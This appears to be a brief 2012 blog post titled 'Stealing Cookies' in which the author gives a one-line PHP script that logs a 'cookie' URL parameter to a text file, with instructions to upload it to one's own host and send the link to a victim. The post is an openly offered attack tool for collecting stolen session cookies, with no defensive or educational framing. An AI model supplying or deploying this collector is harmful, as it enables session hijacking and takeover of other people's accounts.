Thursday 20 December 2012

Stealing Cookies


Hello!
Im Eagle Eye
I'll give some code for stealing cookies

This the code for stealing

<?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('cookielog.txt', 'a'); fwrite($file, $cookie . "\n\n"); ?>

Copy this code to your notepad
Then save as .php

Upload it to your host domain
And give the link to your victim

Credit : Eagle Eye

0 comments:

Post a Comment